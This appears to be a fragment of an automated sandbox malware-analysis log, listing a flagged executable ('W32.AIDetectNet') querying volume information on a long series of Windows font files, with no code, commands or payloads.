                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
